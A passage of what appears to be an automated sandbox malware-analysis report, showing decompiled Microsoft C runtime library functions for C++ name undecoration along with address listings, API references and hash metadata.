						_t15 = _t102 + 1; // 0x1
						_t180 = _t15;
						 *0x13a0b18 = _t180;
						_t109 =  *_t180 - 0x24;
						if(_t109 == 0) {
							_t74 = _t180 - 1; // 0x0
							 *0x13a0b18 = _t74;
							_t104 = E0135C1FB(_t206, _t207,  &_v244, 1, 0);
							_t177 =  &_v84;
							goto L37;
						}
						_t112 = _t109 - 1;
						if(_t112 == 0) {
							L33:
							E0135B7A6( &_v76, 0x13a0b18, 0x40);
							_v68 = "`anonymous namespace\'";
							_v64 = 0x15;
							E0135BB4B(E0135B77F( &_v236,  &_v68),  &_v20, _t209);
							 *_t209 = _v20;
							_t209[1] = _v16;
							_t185 =  *0x13a0b10; // 0x0
							__eflags =  *_t185 - 9;
							if(__eflags != 0) {
								E0135BEE3(_t185,  &_v76);
							}
							goto L40;
						}
						_t121 = _t112 - 0x1a;
						if(_t121 == 0) {
							_t54 = _t180 + 1; // 0x2
							_t122 = _t54;
							__eflags =  *_t122 - 0x5f;
							if(__eflags != 0) {
								L32:
								_push( &_v204);
								_t126 = E0135BE4F(_t180,  &_v212, 0x60, E0135BF5F(_t167, _t206, _t207, _t209, __eflags));
								_t210 = _t210 + 0x10;
								_t104 = E0135BB6D(_t126,  &_v220, 0x27);
								_t177 =  &_v228;
								goto L38;
							}
							__eflags =  *((char*)(_t180 + 2)) - 0x3f;
							if(__eflags != 0) {
								goto L32;
							}
							 *0x13a0b18 = _t122;
							_t128 = E0135C419(_t206,  &_v188, 0, 0);
							_t210 = _t210 + 0xc;
							_t194 = E0135BB4B(_t128,  &_v196, _t209);
							 *_t209 =  *_t194;
							_t209[1] = _t194[1];
							_t132 =  *0x13a0b18; // 0x0
							__eflags =  *_t132 - 0x40;
							if(__eflags != 0) {
								goto L40;
							}
							L31:
							 *0x13a0b18 =  *0x13a0b18 + 1;
							goto L40;
						}
						_t134 = _t121;
						if(_t134 == 0) {
							goto L33;
						}
						_t135 = _t134 - 8;
						if(_t135 == 0) {
							_t50 = _t180 + 1; // 0x2
							 *0x13a0b18 = _t50;
							_t138 = E0135C1FB(_t206, _t207,  &_v164, 1, 0);
							_t210 = _t210 + 0xc;
							_t105 = E0135BB4B(E0135BB6D(_t138,  &_v172, 0x5d),  &_v180, _t209);
							_t167 = 1;
							goto L39;
						}
						_t225 = _t135 == 8;
						if(_t135 == 8) {
							_v12 = _v12 & 0x00000000;
							_t20 = _t180 + 1; // 0x2
							_v8 = _v8 & 0x00000000;
							__eflags = 0;
							 *0x13a0b18 = _t20;
							while(1) {
								E0135C1FB(_t206, 0,  &_v36, 1, 0);
								_t199 = _v32;
								_t210 = _t210 + 0xc;
								__eflags = _t199;
								if(_t199 != 0) {
									_v12 = _v12 & 0x00000000;
									_t207 = 0;
									__eflags = 0;
									_t199 = 2;
								} else {
									__eflags = 0;
									if(0 == 0) {
										_t207 = _v36;
										_v12 = _v36;
									} else {
										_v28 = _v36;
										_v24 = _t199;
										_v60 = "::";
										_v56 = 2;
										E0135BC28( &_v28,  &_v60);
										_t156 = E0135BB4B( &_v28,  &_v140,  &_v12);
										_t207 =  *_t156;
										_t199 = _t156[1];
										_v12 =  *_t156;
									}
								}
								_v8 = _t199;
								__eflags = _t199;
								if(__eflags != 0) {
									break;
								}
								_t144 =  *0x13a0b18; // 0x0
								__eflags =  *_t144 - 0x40;
								if( *_t144 != 0x40) {
									continue;
								}
								__eflags = _t199;
								if(__eflags != 0) {
									break;
								}
								_t147 = E0135BE4F(_t199,  &_v148, 0x5b,  &_v12);
								_t210 = _t210 + 0xc;
								_t202 = E0135BB6D(_t147,  &_v156, 0x5d);
								 *_t209 =  *_t202;
								_t209[1] = _t202[1];
								goto L31;
							}
							_t209[1] = _t209[1] & 0x00000000;
							 *_t209 =  *_t209 & 0x00000000;
							_t209[1] = 2;
							goto L40;
						} else {
							_t104 = E01361429(_t180, _t206, _t225,  &_v124);
							_t177 =  &_v132;
							goto L38;
						}
					} else {
						L47:
						return _t209;
					}
				}
				_t95 =  *0x13a0b18; // 0x0
				_t96 =  *_t95;
				if(_t96 == 0) {
					__eflags =  *_t209;
					_push(1);
					if( *_t209 != 0) {
						_v20 = "::";
						_v16 = 2;
						_t99 = E0135BB4B(E0135BB29(E0135B826( &_v100),  &_v92,  &_v20),  &_v84, _t209);
						 *_t209 =  *_t99;
						_t209[1] = _t99[1];
					} else {
						E0135BDFB(_t209);
					}
				} else {
					if(_t96 != 0x40) {
						_t209[1] = _t209[1] & 0x00000000;
						 *_t209 =  *_t209 & 0x00000000;
						_t209[1] = 2;
					}
				}
				goto L47;
			}














































































                                                                                              0x0135cd2f
                                                                                              0x0135cd3a
                                                                                              0x0135cd3e
                                                                                              0x0135cd41
                                                                                              0x0135cd45
                                                                                              0x0135cd47
                                                                                              0x0135cd47
                                                                                              0x0135cd4c
                                                                                              0x0135cd50
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135cd65
                                                                                              0x0135cd77
                                                                                              0x0135cd7c
                                                                                              0x0135cd87
                                                                                              0x0135cd98
                                                                                              0x0135cd9a
                                                                                              0x0135cda2
                                                                                              0x0135cda7
                                                                                              0x0135cdac
                                                                                              0x0135cdba
                                                                                              0x0135cdbc
                                                                                              0x0135cdbf
                                                                                              0x0135cdc3
                                                                                              0x0135cdc8
                                                                                              0x0135cdc8
                                                                                              0x0135cdac
                                                                                              0x0135cdcb
                                                                                              0x0135cdd3
                                                                                              0x0135d055
                                                                                              0x0135d05a
                                                                                              0x0135d05d
                                                                                              0x0135d05d
                                                                                              0x0135d060
                                                                                              0x0135d064
                                                                                              0x0135d069
                                                                                              0x0135d069
                                                                                              0x0135d06d
                                                                                              0x0135d072
                                                                                              0x0135d075
                                                                                              0x0135d079
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135d079
                                                                                              0x0135cdd9
                                                                                              0x0135cdd9
                                                                                              0x0135cddc
                                                                                              0x0135cde5
                                                                                              0x0135cde8
                                                                                              0x0135d030
                                                                                              0x0135d035
                                                                                              0x0135d043
                                                                                              0x0135d048
                                                                                              0x00000000
                                                                                              0x0135d048
                                                                                              0x0135cdee
                                                                                              0x0135cdf1
                                                                                              0x0135cfd7
                                                                                              0x0135cfe1
                                                                                              0x0135cfe9
                                                                                              0x0135cff7
                                                                                              0x0135d00a
                                                                                              0x0135d012
                                                                                              0x0135d017
                                                                                              0x0135d01a
                                                                                              0x0135d020
                                                                                              0x0135d023
                                                                                              0x0135d029
                                                                                              0x0135d029
                                                                                              0x00000000
                                                                                              0x0135d023
                                                                                              0x0135cdf7
                                                                                              0x0135cdfa
                                                                                              0x0135cf44
                                                                                              0x0135cf44
                                                                                              0x0135cf47
                                                                                              0x0135cf4a
                                                                                              0x0135cf9e
                                                                                              0x0135cfa4
                                                                                              0x0135cfb4
                                                                                              0x0135cfb9
                                                                                              0x0135cfc7
                                                                                              0x0135cfcc
                                                                                              0x00000000
                                                                                              0x0135cfcc
                                                                                              0x0135cf4c
                                                                                              0x0135cf50
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135cf54
                                                                                              0x0135cf62
                                                                                              0x0135cf67
                                                                                              0x0135cf79
                                                                                              0x0135cf7d
                                                                                              0x0135cf82
                                                                                              0x0135cf85
                                                                                              0x0135cf8a
                                                                                              0x0135cf8d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135cf93
                                                                                              0x0135cf93
                                                                                              0x00000000
                                                                                              0x0135cf93
                                                                                              0x0135ce01
                                                                                              0x0135ce04
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135ce0a
                                                                                              0x0135ce0d
                                                                                              0x0135cf03
                                                                                              0x0135cf08
                                                                                              0x0135cf16
                                                                                              0x0135cf1b
                                                                                              0x0135cf38
                                                                                              0x0135cf3d
                                                                                              0x00000000
                                                                                              0x0135cf3d
                                                                                              0x0135ce13
                                                                                              0x0135ce16
                                                                                              0x0135ce2a
                                                                                              0x0135ce2e
                                                                                              0x0135ce31
                                                                                              0x0135ce35
                                                                                              0x0135ce37
                                                                                              0x0135ce3c
                                                                                              0x0135ce44
                                                                                              0x0135ce49
                                                                                              0x0135ce4c
                                                                                              0x0135ce4f
                                                                                              0x0135ce51
                                                                                              0x0135ce9f
                                                                                              0x0135cea3
                                                                                              0x0135cea3
                                                                                              0x0135cea7
                                                                                              0x0135ce53
                                                                                              0x0135ce53
                                                                                              0x0135ce55
                                                                                              0x0135ce97
                                                                                              0x0135ce9a
                                                                                              0x0135ce57
                                                                                              0x0135ce5a
                                                                                              0x0135ce60
                                                                                              0x0135ce67
                                                                                              0x0135ce6e
                                                                                              0x0135ce75
                                                                                              0x0135ce88
                                                                                              0x0135ce8d
                                                                                              0x0135ce8f
                                                                                              0x0135ce92
                                                                                              0x0135ce92
                                                                                              0x0135ce55
                                                                                              0x0135cea8
                                                                                              0x0135ceab
                                                                                              0x0135cead
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135ceaf
                                                                                              0x0135ceb4
                                                                                              0x0135ceb7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135ceb9
                                                                                              0x0135cebb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135ceca
                                                                                              0x0135cecf
                                                                                              0x0135cee2
                                                                                              0x0135cee6
                                                                                              0x0135ceeb
                                                                                              0x00000000
                                                                                              0x0135ceeb
                                                                                              0x0135cef3
                                                                                              0x0135cef7
                                                                                              0x0135cefa
                                                                                              0x00000000
                                                                                              0x0135ce18
                                                                                              0x0135ce1c
                                                                                              0x0135ce22
                                                                                              0x00000000
                                                                                              0x0135ce22
                                                                                              0x0135d0e7
                                                                                              0x0135d0e7
                                                                                              0x0135d0ec
                                                                                              0x0135d0ec
                                                                                              0x0135cd65
                                                                                              0x0135d07f
                                                                                              0x0135d084
                                                                                              0x0135d088
                                                                                              0x0135d09b
                                                                                              0x0135d09e
                                                                                              0x0135d0a0
                                                                                              0x0135d0ae
                                                                                              0x0135d0b5
                                                                                              0x0135d0d7
                                                                                              0x0135d0de
                                                                                              0x0135d0e3
                                                                                              0x0135d0a2
                                                                                              0x0135d0a4
                                                                                              0x0135d0a4
                                                                                              0x0135d08a
                                                                                              0x0135d08c
                                                                                              0x0135d08e
                                                                                              0x0135d092
                                                                                              0x0135d095
                                                                                              0x0135d095
                                                                                              0x0135d08c
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • DName::operator+.LIBCMT ref: 0135CD9A
                                                                                              • DName::operator+.LIBCMT ref: 0135CEDD
                                                                                                • Part of subcall function 0135BC28: shared_ptr.LIBCMT ref: 0135BC44
                                                                                              • DName::operator+.LIBCMT ref: 0135CF29
                                                                                              • DName::operator+.LIBCMT ref: 0135CF38
                                                                                              • DName::operator+.LIBCMT ref: 0135CE88
                                                                                                • Part of subcall function 0135C1FB: DName::operator=.LIBVCRUNTIME ref: 0135C28A
                                                                                              • DName::operator+.LIBCMT ref: 0135D064
                                                                                              • DName::operator=.LIBVCRUNTIME ref: 0135D0A4
                                                                                              • DName::DName.LIBVCRUNTIME ref: 0135D0BC
                                                                                              • DName::operator+.LIBCMT ref: 0135D0CB
                                                                                              • DName::operator+.LIBCMT ref: 0135D0D7
                                                                                                • Part of subcall function 0135C1FB: Replicator::operator[].LIBCMT ref: 0135C238
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
                                                                                              • String ID:
                                                                                              • API String ID: 1026175760-0
                                                                                              • Opcode ID: eac374db0bd231ec3d7686546b81f401b609b2b6efe394da388644f2c5dd82fa
                                                                                              • Instruction ID: f1b4eb48dc326dd67eb50fd221e25ecd3e4c53c636468db78dd9a38cfe7b50ab
                                                                                              • Opcode Fuzzy Hash: eac374db0bd231ec3d7686546b81f401b609b2b6efe394da388644f2c5dd82fa
                                                                                              • Instruction Fuzzy Hash: 09C1B1B19003099FDBA4CFA8C884FEABBF9BB15B0CF04445DE94AA7285DB719645CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01360109 Relevance: 16.9, APIs: 11, Instructions: 362COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 97%
                                                                                              			E01360109(signed int* _a4, signed int* _a8) {
				signed char _v5;
				signed int _v12;
				char* _v16;
				signed int _v20;
				char* _v24;
				signed int _v28;
				char* _v32;
				char _v40;
				signed char _t144;
				signed int* _t146;
				signed int _t148;
				signed int _t149;
				signed int _t153;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				signed int* _t202;
				void* _t205;
				signed int _t211;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t217;
				signed int _t219;
				signed int _t220;
				char** _t222;
				signed int _t232;
				signed char _t236;
				signed int _t238;
				signed int* _t241;
				void* _t244;
				void* _t256;

				_t219 =  *0x13a0b18; // 0x0
				_t144 =  *_t219;
				if(_t144 == 0) {
					E0135BE7A(_t219, _a4, 1, _a8);
					L92:
					_t146 = _a4;
					L93:
					return _t146;
				}
				_t241 = _a8;
				_t220 = _t219 + 1;
				_t211 = _t144 & 0x000000ff;
				 *0x13a0b18 = _t220;
				_v5 = 0;
				_v16 = 0;
				_v12 = 0;
				_t244 = 2;
				_t256 = _t211 - 0x58;
				if(_t256 > 0) {
					__eflags = _t211 - 0x5f;
					if(_t211 == 0x5f) {
						_t236 =  *_t220;
						_t41 = _t220 + 1; // 0x2
						 *0x13a0b18 = _t41;
						_t148 = _t236 & 0x000000ff;
						_v5 = _t236;
						__eflags = _t148 - 0x4e;
						if(__eflags > 0) {
							_t149 = _t148 - 0x4f;
							__eflags = _t149 - 0xa;
							if(_t149 > 0xa) {
								L77:
								_v32 = "UNKNOWN";
								L78:
								_v28 = 7;
								L79:
								_t221 =  &_v16;
								E0135BD97( &_v16,  &_v32);
								L80:
								_t153 = (_v5 & 0x000000ff) - 0x45;
								__eflags = _t153;
								if(_t153 == 0) {
									L85:
									_t222 =  &_v40;
									L86:
									_v32 = "unsigned ";
									_v28 = 9;
									L87:
									_t221 = E0135B77F(_t222,  &_v32);
									E0135BB4B(_t155,  &_v32,  &_v16);
									_v16 = _v32;
									_v12 = _v28;
									L88:
									if( *_t241 != 0) {
										E0135BD24( &_v16, E0135BE4F(_t221,  &_v40, 0x20, _t241));
									}
									_t146 = _a4;
									 *_t146 = _v16;
									_t146[1] = _v12;
									goto L93;
								}
								_t162 = _t153 - _t244;
								__eflags = _t162;
								if(_t162 == 0) {
									goto L85;
								}
								_t163 = _t162 - _t244;
								__eflags = _t163;
								if(_t163 == 0) {
									goto L85;
								}
								_t164 = _t163 - _t244;
								__eflags = _t164;
								if(_t164 == 0) {
									goto L85;
								}
								__eflags = _t164 != _t244;
								if(_t164 != _t244) {
									goto L88;
								}
								goto L85;
							}
							switch( *((intOrPtr*)(_t149 * 4 +  &M01360645))) {
								case 0:
									_push(0xfffffffe);
									_pop(_t212);
									__eflags = 0;
									L56:
									_v16 = 0;
									_t166 = _t241;
									_v12 = 0;
									_t228 =  *_t166;
									_t167 = _t166[1];
									_v32 = _t228;
									_v28 = _t167;
									__eflags = _t212 - 0xfffffffe;
									if(_t212 != 0xfffffffe) {
										__eflags = _t228;
										if(_t228 == 0) {
											_t246 = _t212 & 0x00000002;
											__eflags = _t212 & 0x00000001;
											if((_t212 & 0x00000001) == 0) {
												__eflags = _t246;
												if(_t246 != 0) {
													_v24 = "volatile";
													_v20 = 8;
													E0135BD97( &_v16,  &_v24);
												}
											} else {
												_v24 = "const";
												_v20 = 5;
												E0135BD97( &_v16,  &_v24);
												__eflags = _t246;
												if(_t246 != 0) {
													_v24 = " volatile";
													_v20 = 9;
													E0135BC28( &_v16,  &_v24);
												}
											}
										}
										E01360803(_t212, 0, _a4,  &_v16,  &_v32, 1);
										goto L92;
									}
									_v28 = _t167 | 0x00000800;
									E01360803(_t212, 0,  &_v24,  &_v16,  &_v32, 0);
									_t238 = _v20;
									__eflags = 0x00000800 & _t238;
									if((0x00000800 & _t238) == 0) {
										_v32 = "[]";
										_v28 = 2;
										E0135BC28( &_v24,  &_v32);
										_t238 = _v20;
									}
									_t232 = _v24;
									goto L76;
								case 1:
									_v32 = "auto";
									L52:
									_v28 = 4;
									goto L79;
								case 2:
									_v32 = "char8_t";
									goto L78;
								case 3:
									_v32 = "<unknown>";
									_v28 = 9;
									goto L79;
								case 4:
									_v32 = "char16_t";
									goto L48;
								case 5:
									_v32 = "decltype(auto)";
									_v28 = 0xe;
									goto L79;
								case 6:
									_v32 = "char32_t";
									L48:
									_v28 = 8;
									goto L79;
								case 7:
									__eax =  &_v24;
									_v32 = "this ";
									_v28 = 5;
									__eax = E0135F545(__ebx,  &_v24, __edi);
									_pop(__ecx);
									_pop(__ecx);
									__esi = __eax;
									__ecx =  &_v40;
									__eax =  &_v32;
									__eax = E0135B77F( &_v40,  &_v32);
									__ecx =  &_v32;
									__ecx = __eax;
									E0135BB4B(__ecx,  &_v32, __esi) = _v32;
									_v16 = _v32;
									__eax = _v28;
									_push(2);
									_v12 = _v28;
									_pop(__esi);
									goto L80;
								case 8:
									_v32 = "wchar_t";
									goto L78;
								case 9:
									__eax =  &_v40;
									 *0x13a0b18 = __ecx;
									__eax = E01360671( &_v40);
									__ecx =  *__eax;
									__edx =  *((intOrPtr*)(__eax + 4));
									_v16 = __ecx;
									_v12 =  *((intOrPtr*)(__eax + 4));
									__eflags = __ecx;
									if(__ecx != 0) {
										goto L80;
									}
									L76:
									_t146 = _a4;
									 *_t146 = _t232;
									_t146[1] = _t238;
									goto L93;
							}
						}
						if(__eflags == 0) {
							_v32 = "bool";
							goto L52;
						}
						__eflags = _t148 - 0x48;
						if(__eflags > 0) {
							_t184 = _t148 - 0x49;
							__eflags = _t184;
							if(_t184 == 0) {
								L50:
								_v32 = "__int32";
								goto L78;
							}
							_t185 = _t184 - 1;
							__eflags = _t185;
							if(_t185 == 0) {
								L49:
								_v32 = "__int64";
								goto L78;
							}
							_t186 = _t185 - 1;
							__eflags = _t186;
							if(_t186 == 0) {
								goto L49;
							}
							_t187 = _t186 - 1;
							__eflags = _t187;
							if(_t187 == 0) {
								L47:
								_v32 = "__int128";
								goto L48;
							}
							__eflags = _t187 != 1;
							if(_t187 != 1) {
								goto L77;
							}
							goto L47;
						}
						if(__eflags == 0) {
							goto L50;
						}
						_t189 = _t148;
						__eflags = _t189;
						if(_t189 == 0) {
							 *0x13a0b18 = _t220;
							_t221 =  &_v16;
							E0135BDFB( &_v16, 1);
							goto L80;
						}
						_t191 = _t189 - 0x24;
						__eflags = _t191;
						if(_t191 == 0) {
							_v32 = "__w64 ";
							_v28 = 6;
							E0135BE2D(_t220, _a4,  &_v32, E01360109( &_v24, _t241));
							goto L92;
						}
						_t196 = _t191 - 0x20;
						__eflags = _t196;
						if(_t196 == 0) {
							L39:
							_v32 = "__int8";
							_v28 = 6;
							goto L79;
						}
						_t197 = _t196 - 1;
						__eflags = _t197;
						if(_t197 == 0) {
							goto L39;
						}
						_t198 = _t197 - 1;
						__eflags = _t198;
						if(_t198 == 0) {
							L38:
							_v32 = "__int16";
							goto L78;
						}
						__eflags = _t198 != 1;
						if(_t198 != 1) {
							goto L77;
						}
						goto L38;
					}
					L18:
					 *0x13a0b18 = _t220 - 1;
					_t202 = E01360671( &_v32);
					_t232 =  *_t202;
					_t238 = _t202[1];
					_v16 = _t232;
					_v12 = _t238;
					__eflags = _t232;
					if(_t232 == 0) {
						goto L76;
					}
					L19:
					_t213 = _t211 - 0x43;
					if(_t213 == 0) {
						_v32 = "signed ";
						_t222 =  &_v24;
						_v28 = 7;
						goto L87;
					}
					_t214 = _t213 - _t244;
					if(_t214 == 0) {
						L26:
						_t222 =  &_v24;
						goto L86;
					}
					_t215 = _t214 - _t244;
					if(_t215 == 0) {
						goto L26;
					}
					_t216 = _t215 - _t244;
					if(_t216 == 0) {
						goto L26;
					}
					_t217 = _t216 - _t244;
					if(_t217 == 0) {
						goto L26;
					}
					if(_t217 == 0x14) {
						goto L80;
					} else {
						goto L88;
					}
				}
				if(_t256 == 0) {
					_v32 = "void";
					_v28 = 4;
					L12:
					_t221 =  &_v16;
					E0135BD97( &_v16,  &_v32);
					goto L88;
				}
				_t5 = _t211 - 0x43; // -67
				_t205 = _t5;
				if(_t205 > 0x10) {
					goto L18;
				}
				_t6 = _t205 + 0x1360631; // 0x13eb0448
				switch( *((intOrPtr*)(( *_t6 & 0x000000ff) * 4 +  &M0136060D))) {
					case 0:
						_v32 = "char";
						goto L6;
					case 1:
						_v32 = "short";
						_v28 = 5;
						goto L7;
					case 2:
						_v32 = "int";
						_v28 = 3;
						goto L7;
					case 3:
						_v32 = "long";
						L6:
						_v28 = 4;
						L7:
						_t221 =  &_v16;
						E0135BD97( &_v16,  &_v32);
						goto L19;
					case 4:
						_v32 = "float";
						_v28 = 5;
						goto L12;
					case 5:
						L14:
						__eax =  &_v32;
						_v32 = "double";
						__ecx =  &_v16;
						_v28 = 6;
						__eax = E0135BC28(__ecx,  &_v32);
						goto L19;
					case 6:
						__eax =  &_v32;
						_v32 = "long ";
						__ecx =  &_v16;
						_v28 = 5;
						__eax = E0135BD97( &_v16,  &_v32);
						goto L14;
					case 7:
						__ebx = __ebx & 0x00000003;
						goto L56;
					case 8:
						goto L18;
				}
			}













































                                                                                              0x0136010c
                                                                                              0x01360115
                                                                                              0x0136011c
                                                                                              0x013605fa
                                                                                              0x01360602
                                                                                              0x01360602
                                                                                              0x01360605
                                                                                              0x01360609
                                                                                              0x01360609
                                                                                              0x01360122
                                                                                              0x01360127
                                                                                              0x01360128
                                                                                              0x0136012b
                                                                                              0x01360131
                                                                                              0x01360134
                                                                                              0x01360137
                                                                                              0x0136013c
                                                                                              0x0136013d
                                                                                              0x01360140
                                                                                              0x0136021b
                                                                                              0x0136021e
                                                                                              0x01360286
                                                                                              0x01360288
                                                                                              0x0136028b
                                                                                              0x01360290
                                                                                              0x01360293
                                                                                              0x01360296
                                                                                              0x01360299
                                                                                              0x01360392
                                                                                              0x01360395
                                                                                              0x01360398
                                                                                              0x0136055d
                                                                                              0x0136055d
                                                                                              0x01360564
                                                                                              0x01360564
                                                                                              0x0136056b
                                                                                              0x0136056f
                                                                                              0x01360572
                                                                                              0x01360577
                                                                                              0x0136057b
                                                                                              0x0136057b
                                                                                              0x0136057e
                                                                                              0x01360590
                                                                                              0x01360590
                                                                                              0x01360593
                                                                                              0x01360593
                                                                                              0x0136059a
                                                                                              0x013605a1
                                                                                              0x013605b2
                                                                                              0x013605b4
                                                                                              0x013605bc
                                                                                              0x013605c2
                                                                                              0x013605c5
                                                                                              0x013605c8
                                                                                              0x013605dd
                                                                                              0x013605dd
                                                                                              0x013605e2
                                                                                              0x013605e8
                                                                                              0x013605ed
                                                                                              0x00000000
                                                                                              0x013605ed
                                                                                              0x01360580
                                                                                              0x01360580
                                                                                              0x01360582
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360584
                                                                                              0x01360584
                                                                                              0x01360586
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360588
                                                                                              0x01360588
                                                                                              0x0136058a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136058c
                                                                                              0x0136058e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136058e
                                                                                              0x0136039e
                                                                                              0x00000000
                                                                                              0x013603a5
                                                                                              0x013603a7
                                                                                              0x013603a8
                                                                                              0x013603aa
                                                                                              0x013603aa
                                                                                              0x013603ad
                                                                                              0x013603af
                                                                                              0x013603b2
                                                                                              0x013603b4
                                                                                              0x013603b7
                                                                                              0x013603ba
                                                                                              0x013603bd
                                                                                              0x013603c0
                                                                                              0x0136040d
                                                                                              0x0136040f
                                                                                              0x01360413
                                                                                              0x01360416
                                                                                              0x01360419
                                                                                              0x01360455
                                                                                              0x01360457
                                                                                              0x0136045c
                                                                                              0x01360467
                                                                                              0x0136046e
                                                                                              0x0136046e
                                                                                              0x0136041b
                                                                                              0x0136041e
                                                                                              0x01360429
                                                                                              0x01360430
                                                                                              0x01360435
                                                                                              0x01360437
                                                                                              0x0136043c
                                                                                              0x01360447
                                                                                              0x0136044e
                                                                                              0x0136044e
                                                                                              0x01360437
                                                                                              0x01360419
                                                                                              0x01360480
                                                                                              0x00000000
                                                                                              0x01360485
                                                                                              0x013603c9
                                                                                              0x013603d9
                                                                                              0x013603de
                                                                                              0x013603e4
                                                                                              0x013603e6
                                                                                              0x013603eb
                                                                                              0x013603f6
                                                                                              0x013603fd
                                                                                              0x01360402
                                                                                              0x01360402
                                                                                              0x01360405
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013604d0
                                                                                              0x01360386
                                                                                              0x01360386
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013604a0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136048d
                                                                                              0x01360494
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013604ac
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013604dc
                                                                                              0x013604e3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013604b8
                                                                                              0x0136035b
                                                                                              0x0136035b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013604ec
                                                                                              0x013604ef
                                                                                              0x013604f8
                                                                                              0x013604ff
                                                                                              0x01360504
                                                                                              0x01360505
                                                                                              0x01360506
                                                                                              0x01360508
                                                                                              0x0136050b
                                                                                              0x0136050f
                                                                                              0x01360515
                                                                                              0x01360519
                                                                                              0x01360520
                                                                                              0x01360523
                                                                                              0x01360526
                                                                                              0x01360529
                                                                                              0x0136052b
                                                                                              0x0136052e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013604c4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360531
                                                                                              0x01360534
                                                                                              0x0136053b
                                                                                              0x01360541
                                                                                              0x01360543
                                                                                              0x01360546
                                                                                              0x01360549
                                                                                              0x0136054c
                                                                                              0x0136054e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360550
                                                                                              0x01360550
                                                                                              0x01360553
                                                                                              0x01360555
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136039e
                                                                                              0x0136029f
                                                                                              0x0136037f
                                                                                              0x00000000
                                                                                              0x0136037f
                                                                                              0x013602a5
                                                                                              0x013602a8
                                                                                              0x01360337
                                                                                              0x01360337
                                                                                              0x0136033a
                                                                                              0x01360373
                                                                                              0x01360373
                                                                                              0x00000000
                                                                                              0x01360373
                                                                                              0x0136033c
                                                                                              0x0136033c
                                                                                              0x0136033f
                                                                                              0x01360367
                                                                                              0x01360367
                                                                                              0x00000000
                                                                                              0x01360367
                                                                                              0x01360341
                                                                                              0x01360341
                                                                                              0x01360344
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360346
                                                                                              0x01360346
                                                                                              0x01360349
                                                                                              0x01360354
                                                                                              0x01360354
                                                                                              0x00000000
                                                                                              0x01360354
                                                                                              0x0136034b
                                                                                              0x0136034e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136034e
                                                                                              0x013602ae
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013602b4
                                                                                              0x013602b4
                                                                                              0x013602b7
                                                                                              0x01360322
                                                                                              0x01360328
                                                                                              0x0136032d
                                                                                              0x00000000
                                                                                              0x0136032d
                                                                                              0x013602b9
                                                                                              0x013602b9
                                                                                              0x013602bc
                                                                                              0x013602f8
                                                                                              0x01360301
                                                                                              0x01360315
                                                                                              0x00000000
                                                                                              0x0136031a
                                                                                              0x013602be
                                                                                              0x013602be
                                                                                              0x013602c1
                                                                                              0x013602e2
                                                                                              0x013602e2
                                                                                              0x013602e9
                                                                                              0x00000000
                                                                                              0x013602e9
                                                                                              0x013602c3
                                                                                              0x013602c3
                                                                                              0x013602c6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013602c8
                                                                                              0x013602c8
                                                                                              0x013602cb
                                                                                              0x013602d6
                                                                                              0x013602d6
                                                                                              0x00000000
                                                                                              0x013602d6
                                                                                              0x013602cd
                                                                                              0x013602d0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013602d0
                                                                                              0x01360220
                                                                                              0x01360223
                                                                                              0x0136022c
                                                                                              0x01360232
                                                                                              0x01360234
                                                                                              0x01360237
                                                                                              0x0136023a
                                                                                              0x0136023d
                                                                                              0x0136023f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360245
                                                                                              0x01360245
                                                                                              0x01360248
                                                                                              0x01360270
                                                                                              0x01360277
